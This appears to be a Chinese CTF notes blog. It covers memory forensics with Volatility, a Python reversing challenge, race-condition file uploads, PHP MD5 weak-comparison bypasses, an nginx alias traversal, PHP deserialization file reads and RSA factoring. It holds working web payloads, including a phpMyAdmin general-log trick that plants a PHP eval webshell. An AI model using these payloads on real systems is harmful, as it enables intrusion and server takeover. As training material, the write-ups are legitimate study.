bugku上一道非常类似的题,构造如下:

其实所有题解想写一起的,想想又太长了,还是分开写吧。

内存取证工具 Volatility

Imageinfo命令

用于查看我们正在分析的内存样本的摘要信息。具体来说显示主机所使用的操作系统版本、服务包以及硬件结构(32位或64位)、页目录表的起始地址和该获取该内存镜像的时间等基本信息。

  • .raw .vmem 都可能是内存的dump
root@Archerx:/home# volatility -f mem.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/mem.vmem)
                      PAE type : PAE
                           DTB : 0xb18000L
                          KDBG : 0x80546ae0L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-05-03 04:41:19 UTC+0000
     Image local date and time : 2016-05-03 12:41:19 +0800

notepad

notepad插件能列出当前显示的记事本文本。

connscan

tcp连接池扫描插件

root@Archerx:/home# volatility connscan -f mem.vmem --profile=WinXPSP2x86
Volatility Foundation Volatility Framework 2.6
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x020575f0 192.168.1.185:1031        192.168.1.1:139           0

psscan

扫描所有进程

root@Archerx:/home# volatility psscan -f mem.vmem --profile=WinXPSP2x86
Volatility Foundation Volatility Framework 2.6
Offset(P)          Name                PID   PPID PDB        Time created                   Time exited                   
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x0000000001ee8608 wuauclt.exe        1632   1040 0x088001a0 2016-05-03 04:33:11 UTC+0000   2016-05-03 04:38:12 UTC+0000  
0x0000000002014da0 csrss.exe           616    552 0x08800040 2016-05-03 04:32:12 UTC+0000                                 
0x000000000201eda0 net1.exe            392    320 0x08800260 2016-05-03 04:32:25 UTC+0000   2016-05-03 04:32:27 UTC+0000  
0x0000000002025020 svchost.exe        1096    684 0x08800140 2016-05-03 04:32:13 UTC+0000                                 
0x0000000002026da0 alg.exe            1212    684 0x088002c0 2016-05-03 04:32:26 UTC+0000                                 
0x0000000002030458 svchost.exe         864    684 0x088000e0 2016-05-03 04:32:13 UTC+0000                                 
0x0000000002032b10 lsass.exe           696    640 0x088000a0 2016-05-03 04:32:12 UTC+0000                                 
0x0000000002067020 svchost.exe         948    684 0x08800100 2016-05-03 04:32:13 UTC+0000                                 
0x00000000020e7da0 svchost.exe        1040    684 0x08800120 2016-05-03 04:32:13 UTC+0000                                 
0x000000000221f520 TPAutoConnect.e    1972    512 0x08800320 2016-05-03 04:32:26 UTC+0000                                 
0x0000000002364560 vmtoolsd.exe       1712   1464 0x08800200 2016-05-03 04:32:15 UTC+0000                                 
0x000000000236c988 explorer.exe       1464   1448 0x088001c0 2016-05-03 04:32:14 UTC+0000                                 
0x00000000023715c0 wscntfy.exe        1392   1040 0x08800300 2016-05-03 04:32:26 UTC+0000                                 
0x000000000237d3c0 vmtoolsd.exe       2020    684 0x08800220 2016-05-03 04:32:23 UTC+0000                                 
0x0000000002381880 winlogon.exe        640    552 0x08800060 2016-05-03 04:32:12 UTC+0000                                 
0x000000000239d3e8 TrueCrypt.exe      2012   1464 0x08800280 2016-05-03 04:33:36 UTC+0000                                 
0x00000000023b9210 smss.exe            552      4 0x08800020 2016-05-03 04:32:10 UTC+0000                                 
0x0000000002402b28 svchost.exe        1256    684 0x08800180 2016-05-03 04:32:14 UTC+0000                                 
0x000000000247db28 TPAutoConnSvc.e     512    684 0x088002a0 2016-05-03 04:32:25 UTC+0000                                 
0x000000000247fb28 imapi.exe           420    684 0x08800280 2016-05-03 04:32:25 UTC+0000   2016-05-03 04:32:32 UTC+0000  
0x0000000002485550 spoolsv.exe        1576    684 0x088001e0 2016-05-03 04:32:14 UTC+0000                                 
0x000000000248fda0 services.exe        684    640 0x08800080 2016-05-03 04:32:12 UTC+0000                                 
0x00000000024a19a0 vmacthlp.exe        852    684 0x088000c0 2016-05-03 04:32:13 UTC+0000                                 
0x00000000024a3528 ctfmon.exe         1736   1464 0x08800160 2016-05-03 04:32:15 UTC+0000                                 
0x00000000025b9830 System                4      0 0x00b18000  

memdump

转储进程的可寻址内存数据插件(根据上一步得到的PID)

volatility memdump -p 120 -f mem.vmem --profile=WinXPSP2x86 --dump-dir .
-p  指定进程PID

注:dump下该程序的内存内容后,有时候可能需要从其中提起密钥,使用Elcomsoft Forensic Disk Decryptor软件提取密钥。

支持如下:

  • Volume Matser Key
  • BitLocker
  • TrueCrypt

提取出相应密钥后可直接用该软件解密磁盘(img/wav文件都可)

cmdscan

通过扫描_COMMAND_HISTORY提取命令历史记录,查看cmd历史执行记录

volatility cmdscan -f mem.vmem --profile=WinXPSP2x86
  • --profile=WinXPSP2x86 #带上这个选项

kpcrscan命令

用于查找内存中用于定义内核处理器控制区域(KPCR)的_KPCR结构体信息,具体来说,可以显示每个处理器的详细信息,包括IDT(线程控制符)和GDT(全局段描述符表)地址,当前运行的线程和空闲线程,CPU数量、制造厂商及其速度,CR3寄存器或页目录表基地址的值等信息。该命令的使用方法要用到imageinfo取得的profile信息:

dlllist命令

能够显示一个进程装载的动态链接库的信息,其显示列表主要包括加载的动态链接库文件的基地址、文件大小以及文件所在路径。

filescan命令

此命令将显示系统上的打开的文件,包括已被恶意软件隐藏的文件。

handles命令

显示在一个进程中打开的处理。

modscan命令

扫描_ldr_data_table_entry对象的物理内存。显示内核的驱动程序,包括已隐藏/链接的。

netscan命令

发现TCP / UDP端点和监听器。这个命令将显示一个主动网络连接的列表。

pslist命令

可以枚举系统中的进程,这条命令通过遍历PsActiveProcessHead指针指向的双向链表枚举当前内存中活跃的所有进程信息,主要包括偏移地址、进程ID号、父进程ID号、线程数量、句柄数量、进程会话ID号以及进程开始和退出的时间。

pstree命令

这个命令显示跟pslist一样的信息,只是以树的形式。

hash-identifier

Kali一个不错的小工具,识别hash

root@Archerx:/home# hash-identifier 
   #########################################################################
   #     __  __             __         ______    _____       #
   #    /\ \/\ \           /\ \     /\__  _\  /\  _ `\       #
   #    \ \ \_\ \     __      ____ \ \ \___    \/_/\ \/  \ \ \/\ \       #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\       \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \        \_\ \__ \ \ \_\ \       #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/       #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #                                 By Zion3R #
   #                            www.Blackploit.com #
   #                               Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: hkhdkjhdkjhkjdhkjhdkjd

 Not Found.

   -------------------------------------------------------------------------
 HASH: 6df5fcb2b01cc6653181c34e3042d04a

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(Wordpress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))

   -------------------------------------------------------------------------
 HASH: f689f92371206fc4f1966b9721fb656190d3e5806a3a08c01da78514f4f771b540cbb2884e274af9a02da60b6e9e6fbb8b5e7fd974cf25d95acb35ce8c23bf09

Possible Hashs:
[+]  SHA-512
[+]  Whirlpool

Least Possible Hashs:
[+]  SHA-512(HMAC)
[+]  Whirlpool(HMAC)

python一道很简单的逆向题

uncompyle2恢复源码

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/10/20 上午 09:58

def encrypt(key, seed, string):
    rst = []
    for v in string:
        rst.append((ord(v) + seed ^ ord(key[seed])) % 255)
        seed = (seed + 1) % len(key)

    return rst


if __name__ == '__main__':

    flag = ''
    KEY1 = 'SDUT Network and information security laboratory'
    KEY2 = [54, 14, 30, 3, 5, 30, 43, 28, 37, 231, 28, 79, 52, 44, 15, 40, 6, 17, 2, 56, 233, 22, 35, 170, 18, 24, 12,
            236, 42, 227, 39, 235, 164, 4, 193, 229, 5, 238, 239, 224, 253, 210, 222, 46]
    en_out = encrypt(KEY1, 5, flag)
    if KEY2 == en_out:
        print 'FLAG IS flag{%s}' % flag
    else:
        print 'No'
  • 关于代码中出现余除并且代码并不复杂情况先优先考虑爆破

下面给出了三种解决方法:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/10/19 下午 09:53

def encrypt(key, seed, string):
    rst = []
    for v in string:
        rst.append((ord(v) + seed ^ ord(key[seed])) % 255)
        seed = (seed + 1) % len(key)
    return rst

def decrypt(key1,seed,key2):
    str = ''
    for i in key2:
        v = (i^ord(key1[seed]))-seed
        seed = (seed+1)%len(key1)
        str += chr(v)
    return str


def force_de(KEY1,seed,KEY2):
    flag = ''
    for i in KEY2:
        for j in range(130):
            if i == (j + seed ^ ord(KEY1[seed])) % 255:
                flag+=chr(j)
                seed = (seed + 1) % len(KEY1)
                break
    print(flag)

def force_de2(KEY1,seed,KEY2):
    flag = ''
    for j in range(23):
        for i in range(130):
            if KEY2[j] == (i + seed ^ ord(KEY1[seed])) % 255:
                flag += chr(i)
                seed = (seed + 1) % len(KEY1)
                break
    print(flag)

if __name__ == '__main__':
    KEY1 = 'SDUT Network and information security laboratory'
    flag = '************************************'
    # print(decrypt(KEY1,5,KEY2))
    # force_de(KEY1,5,KEY2)
    # force_de2(KEY1,5,KEY2)
    KEY2 = [54, 14, 30, 3, 5, 30, 43, 28, 37, 231, 28, 79, 52, 44, 15, 40, 6, 17, 2, 56, 233, 22, 35, 170, 18, 24, 12, 236, 42, 227, 39, 235, 164, 4, 193, 229, 5, 238, 239, 224, 253, 210, 222, 46]
    print(encrypt(KEY1,5,flag))
    print(decrypt(KEY1,5,KEY2))
  • 改编自豫商杯一道题

Race Conditions - web中的条件竞争

相关背景介绍

条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。

成因

下面以相关操作逻辑顺序设计的不合理为例,具体讨论一下这类问题的成因。在很多系统中都会包含上传文件或者从远端获取文件保存在服务器的功能(如:允许用户使用网络上的图片作为自己的头像的功能),下面是一段简单的上传文件释义代码:

<?php
  if(isset($_GET['src'])){
    copy($_GET['src'],$_GET['dst']);
    //...
    //check file
    unlink($_GET['dst']);
    //...
 }
?>

这段代码看似一切正常,先通过copy($GET['src'],$GET['dst'])将文件从源地址复制到目的地址,然后检查$GET['dst']的安全性,如果发现$GET['dst']不安全就马上通过unlink($_GET['dst'])将其删除。但是,当程序在服务端并发处理用户请求时问题就来了。如果在文件上传成功后但是在相关安全检查发现它是不安全文件删除它以前这个文件就被执行了那么会怎样呢?

假设攻击者上传了一个用来生成恶意shell的文件,在上传完成和安全检查完成并删除它的间隙,攻击者通过不断地发起访问请求的方法访问了该文件,该文件就会被执行,并且在服务器上生成一个恶意shell的文件。至此,该文件的任务就已全部完成,至于后面发现它是一个不安全的文件并把它删除的问题都已经不重要了,因为攻击者已经成功的在服务器中植入了一个shell文件,后续的一切就都不是问题了。

由上述过程我们可以看到这种“先将猛兽放进屋,再杀之”的处理逻辑在并发的情况下是十分危险的,极易导致条件竞争漏洞的发生。

攻击方式及危害

仍以上述情境为例,攻击者通过不断地发起访问上传的恶意文件请求的方法成功的将原有处理不安全文件

上传文件E→删除不安全文件E
的业务逻辑变成了

上传文件E→访问执行文件E,生成shell文件S→删除不安全文件E
不安全文件E虽然被删除了,但是有它生成出来的shell文件S却保留在了服务器中,对攻击者来说这个shell文件S才是后续攻击的关键。

例子

cuntctf上传三

这个题目属于条件竞争的题目
具体来讲就是在文件上传之后你要赶在服务器把它删除之前访问一下这个文件就可以了
这个题目抓包的时候又在相应的php文件后缀进行了过滤,把php,php2,php3,php4,php5等都过滤掉了,直到试到phtml的时候回显出来一句话

这时候我们就发现文件被删了

条件竞争,我们一边burpsuit跑上传,一边python脚本访问(单线程即可)

burpsuit头如下

POST /challenge/web/uploadfile/upload.php HTTP/1.1
Host: 202.119.201.199
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://202.119.201.199/challenge/web/uploadfile/index.php
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 2442
Cookie: PHPSESSID=25q1p9k8g5fd41v08uj3kp1j60
Connection: close
Upgrade-Insecure-Requests: 1§§

-----------------------------114782935826962
Content-Disposition: form-data; name="file"; filename="youthol3.phtml"
Content-Type: image/png

python 脚本如下

#!/usr/bin/python
# Author:Archerx
# coding:utf-8

import requests
url = 'http://202.119.201.199/challenge/web/uploadfile/upload/youthol3.phtml'

while True:
    res = requests.get(url)
    if 'flag' in res.text:
        print(res.text)

护网杯 lpshop

买辣条也是条件竞争

而后是Mysql bigint型整数溢出。

参考

php中的MD5弱类型

ps:

== 和 != 比较若类型不同,先偿试转换类型,再作值比较,最后返回值比较结果
而=== 和 !== 只有在相同类型下,才会比较其值

0x00

if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

绕过方式: param1=240610708&param2=QNKCDZO

0x01

if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

===强类型,md5的值不进行类型转换,当作字符串处理.需要用数组进行绕过
绕过方式:param1[]=123&param2[]=1231

0x02

if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("seclab507{php_is_weak_____}");
}

var_dump(md5('240610708') === md5('QNKCDZO'));  #False
数组绕过不行会报错
绕过方式:MD5碰撞

fastcoll 生成md5相同的文件:

E:\ctf工具\ctf工具\加解密工具\MD5碰撞\fastcoll_v1.0.0.5>fastcoll_v1.0.0.5.exe -o p1.txt p2.txt
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'p1.txt' and 'p2.txt'
Using initial value: 0123456789abcdeffedcba9876543210

Generating first block: .......
Generating second block: S11...................
Running time: 1.892 s

因为文件含有很多不可打印字符所以进行url编码:

#! /usr/bin/env python2
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/10/6 下午 09:13

import urllib

f1 = open('p1.txt','rb')
f2 = open('p2.txt','rb')
param1 = urllib.quote(f1.read())
param2 = urllib.quote(f2.read())
print('param1='+param1+'&param2='+param2)

本地测试:(使用bp,hackbar会再进行一次url编码)

POST /md5_test/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/md5_test/
Content-Type: application/x-www-form-urlencoded
Content-Length: 317
Connection: close
Upgrade-Insecure-Requests: 1

param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

或者curl 直接请求:

C:\Users\徐超>curl -v http://127.0.0.1/md5_test/ -H "Cookie: PHPSESSID=True" --data "param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> POST /md5_test/ HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 317
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 317 out of 317 bytes
< HTTP/1.1 200 OK
< Date: Sat, 06 Oct 2018 13:25:41 GMT
< Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
< X-Powered-By: PHP/5.5.38
< Content-Length: 27
< Content-Type: text/html
<
seclab507{php_is_weak_____}* Connection #0 to host 127.0.0.1 left intact

挺有意思的网站:https://www.mscs.dal.ca/~selinger/md5collision/

百度杯题解 ZONE

ps: 百度杯的题是真的骚

打开连接先访问的是一个index.html,页面中有一个js跳转,bp看到的。

更改cookie中的login=1,并发包查看返回内容:

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Wed, 03 Jan 2018 05:06:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.30
content-text: text/html;charset=gbk
Content-Length: 1561

<html>
   <head>
      <title>Mini-Zone</title>
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta charset="gbk" />
      <link href="http://cdn.static.runoob.com/libs/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
      <!--[if lt IE 9]>
         <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
         <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
      <![endif]-->
   </head>
   <body>
        <div class="container">
            <div class="row clearfix">
                <div class="col-md-12 column">
                    <nav class="navbar navbar-default" role="navigation">
                        <div class="navbar-header">
                             <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"> <span class="sr-only">Mini-Zone</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button> <a class="navbar-brand" href="/index.php">Mini-Zone</a>
                        </div>

                        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                            <ul class="nav navbar-nav">
                                <li class="active">
                                     <a href="/manages/admin.php">Manage</a>
                                </li>
                                <li>
                                     <a href="/logout.php">Logout</a>
                                </li>
                            </ul>
                        </div>

                    </nav>
                    <div class="jumbotron">
                        ÍøÕ¾½¨ÉèÖУ¡
                    </div>
                </div>
            </div>
        </div>
        <script src="https://code.jquery.com/jquery.js"></script>
    </body>
</html>

发现有一处url是/manages/admin.php跟进去,burp返回

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.10.2
Date: Wed, 03 Jan 2018 05:09:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.30
content-text: text/html;charset=gbk
Location: admin.php?module=index&name=php
Content-Length: 6

可以看到有一个跳转,而且这查询参数咋感觉是文件包含呢。首先想到的是使用php://filter为协议来读源代码,但是试过了没用可能是过滤了,然后是各种试过滤,一点办法都没有。。。
然后忍不住看了writeup。原来还可以读取Nginx配置文件,唉,我是真的对Nginx配置不熟,当时没想过这些,这次算是学到了。
这一题得注意,在向上访问时../被替换为空,于是构造如下url访问NGINX配置文件

GET /manages/admin.php?module=flag.php&name= HTTP/1.1  #读取成功
GET /manages/admin.php?module=../flag.php&name= HTTP/1.1  #读取成功
GET /manages/admin.php?module=..././flag.php&name= HTTP/1.1  #读取失败
#说明了在向上访问时../被替换为空,于是构造如下:
GET /manages/admin.php?module=..././..././..././etc/nginx/nginx.conf&name= HTTP/1.1

返回

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Wed, 03 Jan 2018 05:59:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.30
content-text: text/html;charset=gbk
Content-Length: 2708

#user  nobody;
worker_processes  1;
#error_log  logs/error.log;
#error_log  logs/error.log  notice;
#error_log  logs/error.log  info;
#pid        run/nginx.pid;
events {
    worker_connections  1024;
}
http {
    include       mime.types;
    default_type  application/octet-stream;

    #log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
    #                  '$status $body_bytes_sent "$http_referer" '
    #                  '"$http_user_agent" "$http_x_forwarded_for"';

    #access_log  logs/access.log  main;

    sendfile        on;
    #tcp_nopush     on;

    #keepalive_timeout  0;
    keepalive_timeout  65;

    #gzip  on;

    #server {
    #    listen       80;
    #    server_name  localhost;

        #charset koi8-r;

        #access_log  logs/host.access.log  main;

    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }

        #error_page  404              /404.html;

        # redirect server error pages to the static page /50x.html
        #
    #    error_page   500 502 503 504  /50x.html;
    #    location = /50x.html {
    #        root   html;
    #    }

        # proxy the PHP scripts to Apache listening on 127.0.0.1:80
        #
        #location ~ \.php$ {
        #    proxy_pass   http://127.0.0.1;
        #}

        # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
        #
        #location ~ \.php$ {
        #    root           html;
        #    fastcgi_pass   127.0.0.1:9000;
        #    fastcgi_index  index.php;
        #    fastcgi_param  SCRIPT_FILENAME  /scripts$fastcgi_script_name;
        #    include        fastcgi_params;
        #}

        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        #location ~ /\.ht {
        #    deny  all;
        #}
    #}


    # another virtual host using mix of IP-, name-, and port-based configuration
    #
    #server {
    #    listen       8000;
    #    listen       somename:8080;
    #    server_name  somename  alias  another.alias;

    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }
    #}
    # HTTPS server
    #
    #server {
    #    listen       443 ssl;
    #    server_name  localhost;

    #    ssl_certificate      cert.pem;
    #    ssl_certificate_key  cert.key;

    #    ssl_session_cache    shared:SSL:1m;
    #    ssl_session_timeout  5m;

    #    ssl_ciphers  HIGH:!aNULL:!MD5;
    #    ssl_prefer_server_ciphers  on;

    #    location / {
    #        root   html;
    #        index  index.html index.htm;
    #    }
    #}
    include  sites-enabled/default;

包含了一个文件include sites-enabled/default;,于是继续查看

GET /manages/admin.php?module=..././..././....//etc/nginx/sites-enabled/default&name= HTTP/1.1
Host: d3e2ba10296743b2af46e8100194a3b9876758e6b3bd4266.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: login=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0



HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Wed, 03 Jan 2018 06:04:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.30
content-text: text/html;charset=gbk
Content-Length: 728

                        server {
    listen 80;
    #listen [::]:80 default_server ipv6only=on;

    root /var/www/html;
    index index.php index.html index.htm;

    server_name localhost;

    location / {
        try_files $uri $uri/ =404;
        location ~ \.php$ {
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
            #fastcgi_pass unix:/var/run/php5-fpm.sock;
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi_params;
        }
    }

    error_page 404 /404.html;

    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /var/www/html;
    }

    location /online-movies {
            alias /movie/;
            autoindex on;
        }

    location ~ /\.ht {
        deny all;
    }
}

这里就要注意了,因为有一个autoindex on也就是开启了目录遍历,然后alias /movie/替换匹配部分的url,也就是说如果我访问/online-movies../就会变成访问/movie/../。再加上目录遍历就可读取任意文件了。最后构造如下url获得flag

GET /online-movies../var/www/html/flag.php HTTP/1.1



HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Wed, 03 Jan 2018 06:19:40 GMT
Content-Type: application/octet-stream
Content-Length: 81
Connection: keep-alive
Last-Modified: Wed, 03 Jan 2018 04:57:42 GMT
ETag: "5a4c62c6-51"
Accept-Ranges: bytes

<?php 
$flag='flag{d61d8908-465b-443e-b4b7-558d142f6fdd}';
echo 'flag_is_here';

读取admin.php文件可以看到前面拼接了/var/www/html/所以使用伪协议无法读取文件。

windows下phpmyadmin弱口令直接getshell

通过phpinfo.php 或其他途径获取网站绝对路径

更改phpMyAdmin中变量选项:

general log file D:\phpStudy\MySQL\data\Archerx.php    #拓展名改为php
general log   ON   #打开日志记录

执行SQL语句如:

select "<?php @eval($_POST['archerx']); ?>";

该一句话木马会写入日志文件,菜刀连接即可。

WEB中反序列化读取文件

  • 本文已发布在合天智汇,禁止转发。

XCTF的一道题

<?php
class flag{
    public $file;
    public function __tostring(){
        echo file_get_contents($this->file);
        return 'yes';
    }
}

$a = new flag();
$a->file = 'php://filter/convert.base64-encode/resource=flag.php';
$data = serialize($a);
echo $data.'<br>';
echo unserialize($data);

神盾局的秘密 --pctf

读取showimg.php

<?php
    $f = $_GET['img'];
    if (!empty($f)) {
        $f = base64_decode($f);
        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
        && stripos($f,'pctf')===FALSE) {
            readfile($f);
        } else {
            echo "File not found!";
        }
    }
?>

读取index.php

<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

读取shield.php

<?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

本地测试代码:

<?php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }

        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }

    $shield = new Shield('pctf.php');
    $data = serialize($shield);
    echo $data;
    $res = unserialize($data);
    echo $res->readfile();
    
?>

RSA常用攻击方法

  • 本文以发布在合天智汇,禁止转发。

medium RSA

给出两个文件:

flag.enc
pubkey.pem

基本方法

分解公钥得到N、E

@Archerx MINGW64 ~/Desktop/mediumRSA
$ openssl rsa -pubin -text -modulus -in pubkey.pem
Public-Key: (256 bit)
Modulus:
    00:c2:63:6a:e5:c3:d8:e4:3f:fb:97:ab:09:02:8f:
    1a:ac:6c:0b:f6:cd:3d:70:eb:ca:28:1b:ff:e9:7f:
    be:30:dd
Exponent: 65537 (0x10001)
Modulus=C2636AE5C3D8E43FFB97AB09028F1AAC6C0BF6CD3D70EBCA281BFFE97FBE30DD
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMJjauXD2OQ/+5erCQKPGqxsC/bNPXDr
yigb/+l/vjDdAgMBAAE=
-----END PUBLIC KEY-----
writing RSA key

十六进制编辑器打开密文文件得到加密的十六进制字符串:

C = 0x6D3EB7DF23EEE1D38710BEBA78A0878E0E9C65BD3D08496DDA64924199110C79

N(256bits)很短直接分解即可(我电脑cpu是真的垃圾……分解了好几分钟)

yafu-x64.exe factor(0xC2636AE5C3D8E43FFB97AB09028F1AAC6C0BF6CD3D70EBCA281BFFE97FBE30DD)


fac: factoring 87924348264132406875276140514499937145050893665602592992418171647042491658461
